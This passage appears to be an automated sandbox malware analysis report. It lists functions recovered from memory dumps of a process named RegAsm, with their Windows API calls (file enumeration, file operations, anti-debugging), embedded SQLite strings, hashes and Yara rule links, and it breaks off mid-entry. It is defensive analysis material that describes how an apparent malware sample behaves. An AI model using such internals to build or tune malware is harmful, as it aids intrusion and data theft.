Opcode ID: 0c69b099d378ad8cdfd24c87f9314115fb2290ea22320d676167e748dd43bceb
Instruction ID: 8a5e77b9863af6b226ff7dc5fb5ac28a5c2fe39b41e9eed2e301d918e302b378
Opcode Fuzzy Hash: 0c69b099d378ad8cdfd24c87f9314115fb2290ea22320d676167e748dd43bceb
Instruction Fuzzy Hash: 034180B5E002159BCB14DF59D941AAFB7B8AF54314F11407BE80AE7391E738ED10CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00411D10 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(0041873A,0041873A), ref: 00411D49

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 336d4d8b2dba9eb5ac9ae929dca5d85499c3e2856889d74d340306a8913ab722
Instruction ID: ad82ca9af257c979786628663affac42eb56b3cf1ee156bcd106859eda3eeca6
Opcode Fuzzy Hash: 336d4d8b2dba9eb5ac9ae929dca5d85499c3e2856889d74d340306a8913ab722
Instruction Fuzzy Hash: 22E0A5B0E0421D9BCB40DFE4E40469EBBF4EF48304F40816AD408A6200EB7446458BE9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004173C0 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 165stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004173EE
HeapAlloc.KERNEL32(00000000), ref: 004173F5
wsprintfA.USER32 ref: 0041740E
FindFirstFileA.KERNEL32(?,?), ref: 00417425
StrCmpCA.SHLWAPI(?,004286EC), ref: 0041746C
StrCmpCA.SHLWAPI(?,004286F0), ref: 00417482
wsprintfA.USER32 ref: 004174A0
FindNextFileA.KERNEL32(00000000,?), ref: 004174F8
FindClose.KERNEL32(00000000), ref: 00417507
lstrcat.KERNEL32(?,012BF680), ref: 0041752B
lstrcat.KERNEL32(?,012C2AA0), ref: 0041753F
lstrlen.KERNEL32(000000FF), ref: 00417549
lstrlen.KERNEL32(000000FF), ref: 00417557

Strings

%s\*, xrefs: 00417408
%s\%s, xrefs: 0041749A
pwA, xrefs: 00417579, 004174C2, 004174CA, 00417581

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlenwsprintf$AllocCloseFirstNextProcess
String ID: %s\%s$%s\*$pwA
API String ID: 1803110163-364130743
Opcode ID: ec8b764950fe3f4a6882b3d6d1ee6a5d0524fb5477c33bff5aede5d69c25d398
Instruction ID: ee0857e10955c6073d5021abd361dbdc8db23b38c03d5012e4d9e3a533002cd5
Opcode Fuzzy Hash: ec8b764950fe3f4a6882b3d6d1ee6a5d0524fb5477c33bff5aede5d69c25d398
Instruction Fuzzy Hash: 3151D475900219ABCB10EFA0CC49FEE77B9BF09704F50459EF605A3191DB789B88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 19B8D9E0 Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 564COMMON

Download Yara Rule

Strings

misuse, xrefs: 19B8DAD6, 19B8DE39
API called with finalized prepared statement, xrefs: 19B8DAB0, 19B8DE13
%s at line %d of [%.10s], xrefs: 19B8DADB, 19B8DE3E
API called with NULL prepared statement, xrefs: 19B8DA9B, 19B8DDFE
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B8DACC, 19B8DE2F

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: dda31a4763dbf02b9d90ef6fdab44c680ba409d399f8c47bdc925603bdbf52e4
Instruction ID: 12c4157133047cd0a09e6ead46abb2dc1136901d967fc513b9c236be739bd315
Opcode Fuzzy Hash: dda31a4763dbf02b9d90ef6fdab44c680ba409d399f8c47bdc925603bdbf52e4
Instruction Fuzzy Hash: DB1203B09047519BE7208F24CC45B5B7BE8EF89718F0C492DE9999B2C1E776F409CB92

Uniqueness

Uniqueness Score: -1.00%

Function 19A8B400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 367COMMON

Download Yara Rule

Strings

SELECT %s ORDER BY rowid %s, xrefs: 19A8B665
DESC, xrefs: 19A8B656, 19A8B65E, 19A8B67D, 19A8B685
SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s, xrefs: 19A8B696
ASC, xrefs: 19A8B651, 19A8B678

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: ASC$DESC$SELECT %s ORDER BY rowid %s$SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
API String ID: 0-3496276579
Opcode ID: daec822e5370e25a804bf510bbdc84a785ab94f905dd611b66e7f2b5be1c5780
Instruction ID: 7cb2a40e974a8853a4b19ad6c0ce2e265b133d5a14f63d35ce5b9e25ea917900
Opcode Fuzzy Hash: daec822e5370e25a804bf510bbdc84a785ab94f905dd611b66e7f2b5be1c5780
Instruction Fuzzy Hash: 7CC163B59007419FC7108F24D8417A7BBE8FF84B12F1C492EE8968A691E736F64DCB91

Uniqueness

Uniqueness Score: -1.00%

Function 19ADDB10 Relevance: 18.3, APIs: 12, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f8ddbd5a491f6905d4142089dc2f6a564c2b17d8804074cc936ed4204cca56a
Instruction ID: 03e7ea710810f97970286c8e1af984bb5f7a37e8d734139133b6e2013912bd77
Opcode Fuzzy Hash: 6f8ddbd5a491f6905d4142089dc2f6a564c2b17d8804074cc936ed4204cca56a
Instruction Fuzzy Hash: 2381EE75604305ABD7109F68CD80B2BB3EDEF84B14F08582CF985DB290E771F9098B92

Uniqueness

Uniqueness Score: -1.00%

Function 19ADDFC0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

%lld %lld, xrefs: 19ADE055

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %lld %lld
API String ID: 0-3794783949
Opcode ID: ac6402d9862bb8bd91b14a4b066fbc2c52e2d4a35e7b3dea43474e95f3f903be
Instruction ID: 232a1ea567677fabd0237237624c2f699b0241930e7f5f8a9de6a54ef495f1aa
Opcode Fuzzy Hash: ac6402d9862bb8bd91b14a4b066fbc2c52e2d4a35e7b3dea43474e95f3f903be
Instruction Fuzzy Hash: F231D1762003007BE7125B28CD45F5F7AFEEF81F10F189818FA91922A1E772E91587A2

Uniqueness

Uniqueness Score: -1.00%

Function 19B814D0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 360COMMON

Download Yara Rule

Strings

misuse, xrefs: 19B815AC
API called with finalized prepared statement, xrefs: 19B81586
%s at line %d of [%.10s], xrefs: 19B815B1
API called with NULL prepared statement, xrefs: 19B81571
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B815A2

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 733f1c26cec408c93eb565a418646071d7c446c52f6182d0c0b852cb10219406
Instruction ID: 813a4d9c75197c21e9173676dd9c1b2425f1fed20e944ee4477a652be069940f
Opcode Fuzzy Hash: 733f1c26cec408c93eb565a418646071d7c446c52f6182d0c0b852cb10219406
Instruction Fuzzy Hash: C5C100B49017419BE7208F24D846B977BE9FF48754F0C492CE88A9B2C1E775E44AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19B8D4F0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 310COMMON

Download Yara Rule

Strings

misuse, xrefs: 19B8D5E7
API called with finalized prepared statement, xrefs: 19B8D5C1
%s at line %d of [%.10s], xrefs: 19B8D5EC
API called with NULL prepared statement, xrefs: 19B8D5AC
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B8D5DD

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 64c7a276cafb33db82bb64da8d4fa174ee0605f8b22c8b71b209b4ac372cbad5
Instruction ID: dea940e5c43952de51f8d336744042dc745503ead6af2a2665e89715622ee124
Opcode Fuzzy Hash: 64c7a276cafb33db82bb64da8d4fa174ee0605f8b22c8b71b209b4ac372cbad5
Instruction Fuzzy Hash: 09B1E3B89007419FE710CF24D845B5777E4FF89718F08856EE89A8B381E775E44ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0040A660 Relevance: 13.8, APIs: 9, Instructions: 336fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

FindFirstFileA.KERNEL32(00000000,00427AC2,00000000,?,00427CC4,?,?,00427AC2,?,00000004), ref: 0040A6F1
StrCmpCA.SHLWAPI(?,00427CC8), ref: 0040A73C
StrCmpCA.SHLWAPI(?,00427CCC), ref: 0040A756
StrCmpCA.SHLWAPI(?,012C3080,00000000,?,?,?,00427CD0,?,?,00427AC3), ref: 0040A7EB

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID:
API String ID: 2567437900-0
Opcode ID: 417fddb4da55d50a135db98e9e85244356d3d6bf30ef5c3c0009510e01a1b6fd
Instruction ID: 2ea2fa0ab5ea545b4f28549334ef020faf7293f43af17f0994d5e3a1f08ac2fb
Opcode Fuzzy Hash: 417fddb4da55d50a135db98e9e85244356d3d6bf30ef5c3c0009510e01a1b6fd
Instruction Fuzzy Hash: 74D17170901248EACB10EBA5C9567DDBBB56F19304F50817EF945A32C2EB785B0CCBE6

Uniqueness

Uniqueness Score: -1.00%

Function 0040AAE0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 476fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00427AC6,?,?,00000011), ref: 0040AB53
StrCmpCA.SHLWAPI(?,00427CDC), ref: 0040ABDC
StrCmpCA.SHLWAPI(?,00427CE0), ref: 0040ABF6

Strings

$, xrefs: 0040B17F
\*.*, xrefs: 0040AB15

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindFirstlstrcatlstrlen
String ID: $$\*.*
API String ID: 1618123633-2097405073
Opcode ID: ebdad16dac6d82bfc07cb25e838ba81fa50f8e631c956cc7f6b3648dca9c7f13
Instruction ID: 9d0a2c0e34ca1c445267cdbe06f0ab8ac968f316d4e9e0d5098bc12580de8a59
Opcode Fuzzy Hash: ebdad16dac6d82bfc07cb25e838ba81fa50f8e631c956cc7f6b3648dca9c7f13
Instruction Fuzzy Hash: 9E123E71805149EACB15EBA1C951BEEBB78AF29304F1041BEF50673182DF786B4CCA69

Uniqueness

Uniqueness Score: -1.00%

Function 19B15940 Relevance: 12.4, APIs: 8, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf9c0e22fe0738d416ba1ad8f715d7f5b946b51b9d95a5f581250616e8ecd8d7
Instruction ID: 8e67ded9df6c54f7c9269ef4aab0dccf00f217c58bb04d7a53978b7e4182c0c1
Opcode Fuzzy Hash: cf9c0e22fe0738d416ba1ad8f715d7f5b946b51b9d95a5f581250616e8ecd8d7
Instruction Fuzzy Hash: 67C189B6E583414FE7008E18EC82BDB7791EF82310F8C053EE4858B3D2E2A5E549C792

Uniqueness

Uniqueness Score: -1.00%

Function 19B051D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 19B05264
, xrefs: 19B05334

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: $REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-69911113
Opcode ID: 276b42af404a7e44a71b8244753d7e288c71c92b147ff310e272b5f7334e5bfd
Instruction ID: dc3c4cf4f51297d29ab4cc0962591a84b92a71e730dc888346b14b4c819bedcb
Opcode Fuzzy Hash: 276b42af404a7e44a71b8244753d7e288c71c92b147ff310e272b5f7334e5bfd
Instruction Fuzzy Hash: DB41BFB5900301AFD700DF29CC90B5ABBF9FF88308F494568F989A7251E3B1E951CB92

Uniqueness

Uniqueness Score: -1.00%

Function 19B3D610 Relevance: 10.6, APIs: 7, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
Instruction ID: 62705900632be4210411db3d15c0e548272d1afe9bd3bb5a7d50974730646c6a
Opcode Fuzzy Hash: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
Instruction Fuzzy Hash: E441C375500702ABC701DF25DD80A1BBBF9FF85711F48863CF968862A0E771FA198BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041ED3A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041ED4F
UnhandledExceptionFilter.KERNEL32(8*d), ref: 0041ED5A
GetCurrentProcess.KERNEL32(C0000409), ref: 0041ED76
TerminateProcess.KERNEL32(00000000), ref: 0041ED7D

Strings

8*d, xrefs: 0041ED55

Memory Dump Source

